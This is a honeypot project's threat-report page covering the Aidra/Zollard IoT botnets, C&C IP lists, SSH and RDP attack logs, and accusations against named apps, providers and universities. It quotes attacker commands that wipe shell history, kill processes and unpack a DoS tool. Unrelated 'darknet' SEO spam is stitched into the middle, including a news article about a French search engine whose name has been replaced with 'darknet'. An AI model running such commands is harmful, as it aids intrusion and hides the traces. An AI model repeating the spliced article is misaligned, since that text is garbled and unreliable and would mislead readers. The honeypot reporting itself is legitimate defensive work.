ATMA - darknet - securite internet - deepweb - darkweb
We identify and fight:
- Attackers who try to spy or remotely control others' computers by means such Microsoft remote terminal, SSH, Telnet or shared desktops.
- Threats for email servers or users: spiders/bots, account hijacking, etc.
- Sites spreading virus, trojans, spyware, etc. or just being used by them to let their authors know that a new computer has been infected.
- Threats for servers: exploits, fake identities/agents, DDoS attackers, etc.
- Port scans, which are the first step towards more dangerous actions.
- Malicious P2P sharers or bad peers who spread malware, inject bad traffic or share fake archives.
Are we hackers?
No, we are not, we only report about menaces, exchange information with other researches and warn owners, authorities and providers. Nevertheless, in the past we infiltrated into a few hijacked hosts for a number of reasons:
- They were a top agressive and resilient one in that moment.
- Risk of alerting the bad guys prior to the true administrator.
- Big chances of gathering the controllers' IPs and other data about them.
App for Android "CleanMaster"
While reviewing logs, in april 2017 we found that some visits were followed by some others somehow automatically:
88.18.nnn.nnn - - [01/Apr/2017:16:35:46 +0200] "GET /FolderInMyServer/ HTTP/1.1" 200 8286
"Mozilla/5.0 (Linux; Android 5.0.2; P01Z Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
88.18.nnn.nnn - - [01/Apr/2017:16:35:58 +0200] "GET /FolderInMyServer/FileInThatFolder HTTP/1.1" 206 1
"Mozilla/5.0 (Linux; Android 5.0.2; P01Z Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
188.8.131.52 - - [01/Apr/2017:16:39:43 +0200] "GET /FolderInMyServer/ HTTP/1.1" 200 8286 "-"
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; MAXTHON 2.0); Connect Us
Other IPs behaving like that were 184.108.40.206 and 220.127.116.11, all owned by Amazon EC2. The "user agent" was truthful: all those visitors had installed the app developed by Cheetah Mobile, a chinese company. More, even when you are not browsing the web, it connects frequently to a chinese IP. On april the 23th we asked them by email and never got an answer, so beware: you'll find nothing about this issue in their privacy policies, but the "CleanMaster" app browses the web along with you, literally.
In January 2012 we started detecting a great amount of attacks -mainly Telnet- coming from all sorts of devices like home routers, IPTV / set-top boxes, DVDRs, VoIP devices, IP cameras and media centers that had been hijacked by a new malware, named by its primary author "The Aidra bot-net".
Chances are that your desktop antivirus, firewall, etc. will neither detect it nor stop it. Try to keep your net devices off as long as possible, avoid -more than ever- default/empty/trivial passwords and close every port you don't really need.
Update January 2014: latest Aidra-like malware are targetting all sorts of embedded devices and overloading them with bitcoin mining tools. See how this device will soon get fried (let alone the electricity bill...):
The example above is a IP camera manufactured by esslsecurity.com built on top of a ARM hi3515 board, but any "internet of things" device might get infected, like SOHO routers, smart-TVs, set-top boxes... or a fridge :) Bellow, login page of a cheap Hikvision CCTV system, with such a brilliant default password for root as 12345.
Should you want to know more about this Aidra-like malware, known as Zollard, please see spamversand.de or deependresearch.org. For the list of IPs/hosts, see bellow.
We want everyone out there to know that we have been warning several hosting providers since 2012 about hosts of theirs acting as Aidra C&Cs. Some of them like OVH, Linode, Beirtelecom and Corexchange did nothing. Be warned: hosting your site on any of those providers means that you are likely to be blacklisted by most antimalware tools. On the contrary, we congratulate a few responsible services and companies: Edis.at, VPS.net, Qc.to/Afraid.org and LusoVPS.com.
We want to thank in a special way those few particulars who answered to our first call-for-help, reporting logs, sharing information, etc. Thank you Claus Marxmeier, "Internick.internick" and Robert Sauber.
Q: How can I disinfect my device?
A: Quite often, just rebooting it will work. However, try to access it using Telnet: if you can't, perhaps it has been persistently hijacked or, most probably, your device will be dead. Some Aidra builders were so dumb that not only they will not success but they might have turned your device impaired. In that case, contact us, since chances are that you could recover it with a little help.
Q: How can I protect my devices?
A: If you really need Telnet, set a non-trivial password. Desktop tools such as antivirus, firewall, etc. will not help. They are made for taking care of the device that they are being run in, not your router, IPcam, NAS, TIVO...
Q: How many devices are infected worldwide?
A: It had been said that near 11000 but that was absolutely uncertain, it was only an estimation that somebody made based on a screenshot of a command panel. There are several Aidra botnets and variants and you would need to estimate how many devices have been infected by all of them. On top of that, just remember that a rebooted device very often will stay clean until a new infection, so the total can vary greatly in a matter of hours. Having said that, in june 2012 the amount of infections began to decrease. Sadly, in August there are botnets with about 18000 zombies.
Q: Is my smartphone or tablet in risk?
A: At the moment, not specially. Somebody missunderstood our report. We just said that -in theory- Aidra could infect some smartphones, since it can be run under all sorts of CPUs but we have never detected a single one. Actually, Aidra would need to be adjusted to take into account a particular file system, hardware, etc. as well as try something different than Telnet. That's why Aidra is seldom infecting those devices:first time we saw an infected Android device was in August 2012. Having said that, your smartphone can be infected by many other kinds of malwares. On a side note: both iOS and Android are based on Linux but their internals are quite particular.
Q: What about my desktop computer or laptop?
A: Currently there are not much reasons to worry about Aidra.
Q: Will be Linux unsafe from now on?
A: Not at all. Aidra takes advantage of dumb or lazy users/admins who don't care about passwords. You can buy the best safety-box in the world, but if you leave it open...
Q: Is Aidra such a great threat?
A: For individuals it depends on a number of things. If Aidra took over yout set-top box, for example, chances are that you will just find Internet slower than usual. But, if I were you, I wouldn't like to have any kind of malware inside my home router because all data can be trivially stolen. More, since september 2012, a italian botnet master is trying hard to raise money from Aidra, which has used for his bitcoins affairs, but he is also interested in smartcards, which would be much more worrying. Apart from that, we bet that, given the careless attitude of goverments and companies, sooner or later a malware of this kind will be improved enough as to scare the entire world.
Q: Which countries are more affected?
A: As said, it is difficult to say even how many infected devices there are. In Europe most nets have been commanded from Italy (despite using servers in other countries), while most infected devices used to be in Sweden, Switzerland, Netherlands and Poland. Lots also in India and China and not as many as expected in the USA and Japan. As of June 2012, Aidra had nearly vanished but there were still two very active botnet sets left. We sent evidences to the Carabinieri about the first one, and we got (not surprisingly) no answer. The other Aidra botnet set was alive and kicking but quite silent since august, though. Strangely, it was targetting IPs mostly in the US. Last, despite it was not its primary purpose, Aidra has been quite successully figthed since more than one year ago by Carnas's author (whose identity shall remain unreveladed).
Q: I would like to know in detail about Aidra, or get samples, source code...
A: Contact and tell us about you or your organization (which best apply) and what you want that stuff for.
Aidra hosts as of 17th Sept. 2012. Since then, read bellow.:
(*) Very active.
(**) Not a true Aidra but a "DDoS-only" version (Kaiten).
(***) Redirector disabled
(****) Attacking Monsanto websites
How to position yourself on the darknet keyword ?
To position yourself on the darknet term, you will have to use at least the two essential natural SEO techniques, the generation of quality content and the generation of quality backlinks and repeat all this until first place !
What does the term darknet mean ?
It is important to define darknet securite internet correctly. Indeed the lexical field and the semantics around a keyword are very important in order to rank on darknet. You have to use as much of the vocabulary around darknet as possible to make the search engine understand what you're talking about. The point is, here darknet is not a real word ! It was invented. So the difficulty is even greater for the algorithm to understand what it is about. The challenge is even greater for referencers. The latter will have to actually create the definition of the word darknet themselves. It is they who choose what their site will talk about and therefore how will define darknet. The fact is that for now, everyone is copying everyone and agreeing that darknet would be a kind of "product" offered by a SEO agency.
This works because by doing this, it is easy to increase the density of the darknet keyword in its content and thus help the algo to understand which query to answer. Because actually, it's still the base, the number of times you write a keyword in its content. Anyway, it's too late to talk about another subject now. The algorithm understands that when we speak of darknet, we speak overall of natural SEO, SEO agency and contest. Aside from these three topics, it's getting hard to position yourself.
Content strategy for darknet
Content level in the broad sense of the term, there are three types to use to position yourself on darknet :
- The textual content as we have just seen
- Visual content, with images that are often free of rights and that make us think of the web to get closer to the meaning we have given to the darknet keyword. Videos we can find online that talk about seo and if possible darknet.
- Social media content, especially Twitter. The latter is the most widely used social network on the internet. DEEP WEB.com the contest to by the way Are own Twitter account called darknet.
- Netlinking strategy for darknet
Finally, on the subject of darknet, we should not forget to mention the netlinking strategy, which works very well in addition to the content. The higher the quality of the competitors ' sites, the faster their sites will position themselves on darknet. Sites that link to them need to talk about the topic and have the darknet keyword as their anchor.
Yet this is what a French search engine called darknet does, from a small office located on the banks of the Seine.
The French start-up, whose product was launched 18 months ago, is drawing growing anger here that Google has too much control over how Europeans surf the web.
Some lawmakers in the region have already called for the dissolution of the American research giant, while the European Commission, the executive body of the European Union, is in the midst of a lengthy antitrust investigation into the share of around 85 % of Google in the European search engine market.
"You have to make a choice," said Jean Manuel Rozan, a former financier who co-founded darknet in 2011, over a cup of coffee. "Europe is the only place in the world where people think Google is the Internet."
But it's easier to turn Europe's anti-Google sentiment into a successful business.
Google and its various services, including cards and online shopping, have a grip on how Europeans look for information. And despite the perceived antipathy of Europeans towards American technology companies like Amazon and Facebook, these companies continue to be strongly followed in the 28 countries of the block.
Pour se démarquer, darknet a vendu cette année 20 % de ses parts à Axel Springer, l’éditeur allemand, pour environ 6 millions de dollars, principalement pour acheter des serveurs européens. Mathias Döpfner, le directeur général de l’éditeur, a ouvertement critiqué la domination de Google en ligne. M. Rozan affirme que darknet a réalisé un bénéfice d’environ 1,8 million de dollars l’année dernière mais qu’il affichera une perte en 2014, alors que la société s’étend sur de nouveaux marchés comme l’Allemagne. L’entreprise emploie moins de 50 personnes entre ses bureaux de Paris et de Nice, une ville du sud de la France.
The French start-up has also tried to take advantage of the growing mistrust of Europeans regarding the way they are tracked online, as companies like Google and Facebook use the data collected on the history of Internet users to adapt advertising to the specific needs of each.
Along with other alternatives to Google like DuckDuckGo and Ixquick, a Dutch search engine, darknet claims that it does not follow the movements of Internet users and sells advertising solely on the basis of search queries from individuals.
"We can build a valuable business that can deliver search results to people without following them," said Rozan, who said that people made about 1.6 billion search queries by darknet in 2014 - or less than half of the search queries that Google processes in a single day.
darknet also plans to launch a child-friendly search engine - darknet Junior - in early 2015. Google has announced similar plans, but in a sign that the French government is keen to find an alternative to the US tech company. , the national education ministry said it will start using DEEP WEB Junior in some French schools next year.
"If you have three million children who will search on darknet, then there will be six million parents who will know darknet," said Eric Leandri, another of the co-founders of the start-up, who added that the start -up was in discussion with Axel Springer to become the default search engine on some of the publisher's websites. “When we launched the start-up, everyone explained to us why we shouldn't do it. Now they think it's a good idea. "
The other novelty of darknet compared to the traditional search engine model is to include social media messages from services like Twitter directly in the search results.
When people use the company's search engine, for example, four columns appear on the web page that offer different takes on Internet queries. This ranges from traditional search results to what is known as the "Qnowledge Graph", which provides general research-based information from sites such as Wikipedia.
"We want to deliver results both on the web and on social media," said darknet's Rozan. "If we just want to offer the same service as Google, we should stop now."
The French could also learn a few lessons from Europe's past. In 2008, a French consortium - supported by the country's politicians - created Quaero, an online research tool supposed to compete with its American counterparts. However, after $ 240 million in public and private funding and several efforts to reorganize the project, Quaero was closed in late 2013.
Despite previous failures to build a credible European search engine, co-founders of darknet hope the focus on privacy and attempts to combine social media posts with traditional search results will set it apart from Google, whose projects are as diverse as an operating system for smartphones and which is trying to develop driverless cars.
"Google is no longer a search engine," said Leandri of darknet. “We are just a search engine. We don't make robots ”.
On sept. the 18th we were receiving so many malwares (and not only "Aidra fresh builds") that we thought that it would be worth to start the historic track bellow. Please note that, on the contrary, some of the Aidra builds that have been active for long are listed above.
sept. 23th attacking:
(both IPs, in turn, used by hackers)
120917A (2 malwares in this record)
18.104.22.168:6667 ircnet.irkki.fi irc.atw-inter.net irc.stealth.net open.ircnet.net uk.ircnet.org
22.214.171.124:8620 sm4sh.mashing.it OVH Italia
(We had an hiatus from december to february)
126.96.36.199:6667 (Pusat Media)
188.8.131.52:6667 (Uber Global)
184.108.40.206 220.127.116.11.vps.nixhosting.org myLoc
18.104.22.168 22.214.171.124.vps.nixhosting.org myLoc
126.96.36.199 WEDOS (Cz)
188.8.131.52 Dacentec (US)
184.108.40.206 ks26330.kimsufi.com (OVH) or:
(most also resolve to 220.127.116.11)
18.104.22.168 li433-213.members.linode.com www.pucssa.org
22.214.171.124 VPS NET
126.96.36.199 aku.eten-keren-a.biz (Linode)
188.8.131.52 rapidshare-search-center.com (OC3, USA)
184.108.40.206 irc.coplax.us.to (Sharktech)
220.127.116.11 Wedos (Cz)
18.104.22.168 Tilaa (NL) (already dead)
22.214.171.124 atlantic532.eu.unmetered.com (Germany)
126.96.36.199 ks39329.kimsufi.com (OVH)
Versions like this one are compiled with messages in a perfect italian:
"Alla prossima BoSS... baciamo le mani!" (we kiss the new boss' hands)
"Hai sbagliato Frocio di Merda!" (you did it wrong, -insult-)
188.8.131.52 (USA, VPS Cheap)
Aidra had slowed down its new releases,
so a handfull versions weren't published during these months.
Starting with this one, nearly all new versions are "Zollard" malware.
184.108.40.206 155.ip-46-105-17.eu OVH
220.127.116.11 OVH Systems socialmediaexpert.info
18.104.22.168 FranTech Solutions buyvm.net; april: calpolyfast·org
22.214.171.124 mining.usa.dallas.hypernova.pw (OVH)
126.96.36.199 ds.protected.javapipe.com > 188.8.131.52.reserved.voxility.com (Romania)
184.108.40.206 ltc-eu.give-me-coins.com (Secured Servers LLC)
220.127.116.11 hosted-by.securefastserver.com (qhoster.net)
18.104.22.168 22.214.171.124.in-addr.arpa.static.cnservers.com (US)
126.96.36.199 OVH, FR
188.8.131.52 Fastreturn, US
184.108.40.206 vypor.is.awesome.net Quadranet. US
220.127.116.11 Ecatel, NL
18.104.22.168 Serverius Holding (NL)
Same thing than 140209 using also:
22.214.171.124:3339 Serverius hosting (NL)
126.96.36.199:164 mcflix.com and ww20.netkl.org Dacentec, Inc. (US)
"Reloaded" 140209 miner version
188.8.131.52 unassigned.quadranet.com OC3 Networks & Web Solutions (US)
"Reloaded" 140210 miner version
184.108.40.206 Ecatel Network, Netherlands
Surely a new 140202 version, quite complete "features":
Trying to permanently infect devices, adv. fraud
and stealing set-top credentials.
220.127.116.11 resolving as '.' :) FranTech Solutions (US)
18.104.22.168 FranTech Solutions (US)
22.214.171.124 Eonix Corporation (US)
126.96.36.199 li352-247.members.linode.com (UK)
We are glad "Vypor" has been visiting us in April from 188.8.131.52.
Again, a 140202 new version
184.108.40.206 WholeSale - MJS Marketing, US. financecox.com, gamersnoo.com and a few more
220.127.116.11 Snel Internet Services, Netherlands smartmoneymakers2.com
18.104.22.168 connect.bigddos.net irc.bigddos.net Pallada Web Service / PWS-Network Russia
"Reloaded" 140210 miner version
22.214.171.124 Ecatel Network,NL
126.96.36.199 212-129-3-25.rev.poneytelecom.eu ONLINE S.A.S France
"Reloaded" 140210 miner version
188.8.131.52 Snel, Netherlands
184.108.40.206 Ecatel Network,NL, now in TCP 3342
220.127.116.11 DataWagon LLC US
18.104.22.168 205.ip-92-222-162.eu AS16276 OVH
22.214.171.124 AS16276 OVH Hosting Canada
New 140209 version
126.96.36.199 in TCP 9003, Fastreturn, US
188.8.131.52 former vypor.is.awesome.net, now 184.108.40.206.static.quadranet.com
220.127.116.11 crypto-pump.com WholeSale - MJS Marketing
Just another "Vypor" clon
18.104.22.168 TCP 8005 nlnd02.xsltel.com Ecatel NL
22.214.171.124 h-176-10-250-37.na.cust.bahnhof.se Bahnhof Internet, Sweden
Rebuilt 140815 version
126.96.36.199 in TCP 65533 and 65534 nlnd02.xsltel.com Ecatel NL
188.8.131.52 AS46816 Directspace houlai.org, nvshizhu.com
184.108.40.206 AS8473 Bahnhof Internet, Sweden
220.127.116.11 AS9009 M247 Open Hosting, UK
18.104.22.168 AS32097 WholeSale MJS Marketing
Rebuilt 140815 version, same IPs
About our Twitter account
All tweets are randomly delayed: it may take hours or days since the actual detection. Besides, due to Twitter limits, we tweet only a fraction of all detections (usually we tend to skip already wellknown bad IPs such as those famous chinese SSH attackers)
For those who send traffic claiming to be "good", for academic purposes or for the sake of our own safety, please note that our policy is simple: a unique unexpected SYN packet may be enough to be reported. If your intentions are not hostile, surely the World already knows about them and our reports don't mean a thing.
If you are a hosting company, ISP or alike, don't ask us for detailed logs, evidences, etc. unless they are really needed. Firstly, if you really want to know about them, you should know that in most cases, it's as easy as just monitoring outbond traffic related to the reported attacks. Secondly, we can not provide dozens of that kind of reports for free each single day. Keeping an eye on your customers' behaviour is your job, not ours. Besides, we will never answer to dumb Twitter bots spitting "Please report that issue to blah blah" tweets, only for entering in a "customer ticket hell" and get a final response such as "Sorry, you are not a customer of ours, please email to... ".
Currently, our Tweets fall into one of this categories:
"ssh": SSH daemon/server, usually port TCP 22, although we watch alternative ports for most services.
"telnet": Telnet daemon/server, usually TCP 23.
"mailer": Email daemon/server, several ports.
"rdp": Windows terminal server (Windows), usually TCP 3389.
"vnc": Remote Desktop Servers, usually TCP 5900.
"ftp": File Transfer Protocol, usually TCP 21.
"spam": Email/forum/referral/you-name-it spammers, close affiliates or just those who pay for it.
"malware": Plain hosting, command & control servers, etc.
"http": Threats, scans, bad crawlers, etc. targetting web servers and related technologies such as HTTPS, proxies, PHP, *SQL...
"ntp": Network Time Protocol, commonly abused for DDoS amplification attacks.
"dns": Domain Name System, commonly abused for DDoS amplification attacks.
"smb": Windows shares (NetBIOS, SMB, CIFS).
"unspecified": Such as those targetting port 19 "CharGen", port scans, ping floods, etc.
Yet one more backdoor in an embedded device?
After taking a look at the file system of a used Zyxel_P-2612HNU that we recently got, we found a weird thing apart of the already known vulnerabilities such as the "NsaRescueAngel" issue. If you type gzip -d /mnt/NAND/etc/rc.conf.gz -c in a Telnet session, you'll get:
22.214.171.124 belongs to CSC (Computer Sciences Corporation, Virginia, US) and there are/were four domains that pointed to that IP: bhsywg.com (protected whois), gporodiedan.com (mexican company), advocaciatorresrn.com (brazilian company) and kedvezo-hitelek.com (protected whois). Please someone skilled in TR069 tell us wether this could be a backdoor and who might have put it here or, on the contrary, it's just debugging data left behing.
Since June the 21th the website escolademusica.molinsderei.org was attacking servers in Spain. First of all, we warned the ISP, the webmaster and that council's authorities -none was kind enough as to reply a mere "thanks"- and afterwards we investigated who the actual attackers could be. Let's suppose than in "Molins de Rei" there are no fanatics related to that website, so we can assume they were using hijacked servers, apart of some proxies and a lot of IPs from islamic countries. After a few searching in Google, Whois, Geolocation, etc. we got to know that the culprits are a islamic gang of script kiddies that compite mostly for defacements, while they share pro-islamic interests.
The good news is that they are clumsy and not very skilled: most just look for missconfigured servers with "PUT" enabled; they simply try to upload a file and then download it, which means that PUT is working for sure. So we got one of those files, a GIF image whose author uses as a "signature" (filename in Russian, he's smart as can be) and we waited...
In a few hours we saw the first "PUT /nyet.gif" + "GET /nyet.gif" attempt. Believing he had succeed, he hurried to report his "achivement" to his mates :) in the infamous www.zone-h.org and, in a moment, we began receiving more attacks of the kind as well as some XSS. Some days later they gave up, but meanwhile we have been collecting all their IPs (please note: we are not listing proxies or hijacked servers, which, BTW, is mostly a Kosovar speciality):
IP address Other information
AS36947 Algerie Telecom
AS36947 Algerie Telecom
AS197328 31-210-117-181.turkrdns.com, Turkey
AS29256 Syrian Telecommunications
AS35819 Etihad Etisalat Company, Saudi Arabia
AS36947 Annaba Telecom, Algeria
AS51407 Mada ALArab LTD Segment, Palestine
AS37492 Orange - Agence Tunisienne Internet
AS36947 Region Chlef, Algeria
AS6713 ADSL_Maroc_telecom, Rabat, Morocco
AS29256 Tarassul ISP, Syrian Telecommunications
AS12975 Palestine Telecom
AS35819 Saudi Arabia
AS9121 TTNET Turk Telekomunikasyon
AS37492 ORANGE-TN Tunisia
AS6713 IAM-AS,MA Morocco Tangier Maroc Telecom
AS8452 TE Data, Egypt
Beware fake Microsoft assistance scam
In May-June 2014 several people in Spain was phoned from a fake Microsoft customer service. So far these are the numbers we got to know: 16077670057 and 15124511556. Beware also of 4935120443, 442033100000 and 18176499077.
Atma.es under attack
No wonder, just another one, but this time it was more intense than usual although not sophisticated at all: they simply tried to overload this server by downloading some files over and over. By using our own deny list -excepcionally and urgently updated during those days- we got rid of most malicious visitors (nearly all being proxies in infected boxes or Tor nodes). Happily, a choice of them went soon offline because they can not cope with some bounced back traffic :) Please, dear attacker: (as long as you can't find a better way) keep on trying, we miss your huge amount of requests!!!
Yet another University scanning the entire world!
In this website we have already talked about the University of Columbia peeking inside each and every IP in the world since years ago. Well, it seems to be fashion these days in the USA, since in 2013 the University of Michigan began a similar "research". If you want to get rid of those visits, block all IPs from 126.96.36.199 to 188.8.131.52.
WTF is going on with some Microsoft's IPs?
8075 | MICROSOFT-CORP---MSN-AS-BLOCK | 184.108.40.206 | 2012-11-03 17:15:18 | vncprobe
8075 | MICROSOFT-CORP---MSN-AS-BLOCK | 220.127.116.11 | 2012-11-08 06:53:08 | vncprobe
8075 | MICROSOFT-CORP---MSN-AS-BLOCK | 18.104.22.168 | 2012-11-08 06:30:55 | vncprobe
8075 | MICROSOFT-CORP---MSN-AS-BLOCK | 22.214.171.124 | 2012-11-08 05:49:12 | vncprobe
One incident in detail:
08/11/2012 04:13:32 Got connection from client 126.96.36.199
08/11/2012 04:13:32 authProcessClientMessage: authentication failed from 188.8.131.52
08/11/2012 04:13:32 rfbAuthProcessClientMessage: password check failed
08/11/2012 04:13:32 Client 184.108.40.206 gone
08/11/2012 04:13:32 Statistics events Transmit/ RawEquiv ( saved)
08/11/2012 04:13:32 TOTALS : 0 | 0/ 0 ( 0.0%)
08/11/2012 04:13:32 Statistics events Received/ RawEquiv ( saved)
08/11/2012 04:13:32 TOTALS : 0 | 0/ 0 ( 0.0%)
08/11/2012 04:13:33 Got connection from client 220.127.116.11
July 2013, some more detected from MSN-AS-BLOCK:
18.104.22.168 22.214.171.124 126.96.36.199
188.8.131.52 184.108.40.206 220.127.116.11
(Yet another) Remote desktop attack
We receive attacks to port 3389 on a daily basis, but these days they have increased hugely. This is what we got yesterday (sept. 22th) from one IP alone:
Universities and hacking
The fact that there are important and prestigious institutions with infected computers is worrying. But even more, when we are talking about departments concerning teaching about computers. In the past we warned some of them in Germany, USA and the UK, and all of them sorted the issue out promptly. On the contrary, some others like the spanish UNED neither answered nor fixed them. Right this september, it happened the same again: this time we warned the "Dipartartimento di Informatica" of the University of Milan about 18.104.22.168 kermit.crema.unimi.it which was attacking others' 3389 ports. More than one month ago, we wrote to nine email addresses: professors, researches and bureau... none of them was kind enough as to write back a single line. So, we still don't know wether it was an infected box or they were the true hackers but, too good, at least we detected no more attacks since then.
Why does Nokia want to know my email password?
Did you know that when you use the Nokia's email app, you are giving them your address and password, as seen in this blog?. In Nov. 2011 we checked it out by ourselves using a Nokia X3-02 and a gMail account:
Chinese and russian scanners
In Oct. 2011 a number of IPs brought to our attention. Mostly located in China, those people has been scanning the rest of the world since years ago.
Clearly linked to "Proxyfire" Other scanners
Note that it is useless to complain or warn someone, since they are not hijacked devices. Apart of other intentions, as a result of their actions many others are wasting time and resources, and that's why we [will do our best for disturbing them a little from March on.] are glad to see that Proxyfire has been facing some trouble during april:
The other scanners needed to set up at least five spare (until then) sites after april 2012:
22.214.171.124 proxyproxys·com piggmail·com verysurf·com nsegame·com
A boo for a couple image-hosting places
In sept. 2011 our site suffered a persistent attack from 126.96.36.199, a (by then) hijacked server in Poland. We contacted the owners and studied the malware. As a result, we got to know that those indonesians were using a few image-sharing sites for their "soft", so we contacted iconspedia.com and tinypic.com asking for their help (a third site was clearly involved in the malicious events). No answer at all.
Where on earth are the Honeypots?
After reading the "Cyber Crime Alert" report by the FBI (spring of 2011) it seems that bad guys think that here, in Spain, we run an incredible 69 per cent of the Honeypots in the World and, besides, they use to share the IPs where honeypots are supposed to be. Well, concerning our own IPs, wether they are right or not must remain unrevealed, but the given percentage is utterly wrong. In fact, we don't know of any other Honeypot here apart from ours.
Weird ways of figthting cybercrime:
Visit from www.delitosinformaticos.gov.co (Colombian gov. agency "Grupo Investigativo Delitos Informáticos") :
188.8.131.52 - - [17/Feb/2010:13:57:49 +0200] "GET pollbooth.php?include_path HTTP/1.1" 404 613 www.atma.es "-" "Mozilla/5.0" "-"
No comment :D
September of 2009: attackers tried to login under 10374 different user names.
The most attacked were:
Advice: choosing user names in any other language than english is safer. Spanish speakers should avoid "David", "Amanda" and "Martin" (common names in both languages).
Bad boys never sleep:
2009, fall of the night of the 24th. While many countries are celebrating Christmas Eve, attackers were taking advantage of it. The most striking one detected by us was during that hours was a SSH dictionary attack from 184.108.40.206. It lasted for 8 hours and they tried 20.859 username + password combinations.
2010, July the 7th. While millions are enjoying the Germany vs Spain FIFA World Cup 2010 semi-final, a host in Spain reports a (not actually) succesful SSH dictionary attack:
Jul 7 19:27:42 (void) sshd: Accepted password for (not shown) from 220.127.116.11 port 47065 ssh2
Jul 7 20:25:37 (void) sshd: Accepted password for (not shown) from 18.104.22.168 port 46649 ssh2
Jul 7 21:17:08 (void) sshd: Accepted password for (not shown) from 22.214.171.124 port 1266 ssh2
Jul 7 23:45:48 (void) sshd: Accepted password for (not shown) from 126.96.36.199 port 33195 ssh2
Jul 7 23:47:14 (void) sshd: Accepted password for (not shown) from 188.8.131.52 port 51866 ssh2
Jul 7 23:53:28 (void) sshd: Accepted password for (not shown) from 184.108.40.206 port 30856 ssh2
Some flashy detections:
Telnet scans from 220.127.116.11 -18.104.22.168 (Columbia University) which happened to be a false positive. Read about their project. Nevertheless, after a re-visit in Sep. 2011, we found a number of things that we dislike:
They don't say when it will come to an end, it is always an "ongoing" project. I guess that knocking at other's doors should last as short as possible. Since they have moved to SSH probing, what's next?
They are making money of it: a company, several patents, sponsored by several military offices, conferences, publications... Therefore, output about the results is scarce. If noboby else is going to take advantage of the investigations, it does not make much difference compared to other daily scans.
Fake results in Gnutella network from 22.214.171.124 (www.markmonitor.com) in March 2010... when looking for public domain files!
Port scan from 126.96.36.199 (www.trustedsource.org, owned by McAfee Antivirus) in December 21th 2009.
Sharing fake files in Gnutella network from 188.8.131.52 (Microsoft Corporation), October 21th and November 1st of 2009..
Port scan from 184.108.40.206 (Avast Antivirus) in September and October of 2009.
Assorted SSH attacks
After a previous succesful login
rm -rf .bash_history
Attempting to get rid of the honeypot
kill -9 -1
exit Sending malware to the target
tar zxvf udp.tgz
Other deliveries came from
Attackers don't want us to see what they do
unset HISTFILE HISTSAVE HISTLOG WATCH
Attempting to run malware
Dumb DoS or speed test?
This project is nonprofit. If you feel that you could donate or you've got some hardware you don't need, please contact us.
2-Join us or share your information, findings, logs...
We are always glad to receive information about attackers, new threats etc. Also, we have developed some automatic tools that collect, select, clasify and merge IPs from a variety of logs. If you think that some in your system could help us, please drop us a line. As for now, we can directly use logs from several P2P programs, some models of routers, Linux logs and a handful of other stuff.
3-Special request for english speakers
English is not our first language. We would be very grateful if you let us know about typos, weird expressions, etc.
4-Run a honeypot
Straightforward to run, transparent, no installation, just "chmod + x" and you're done. Alternatively you can use our web forms or API. Please contact us for further info.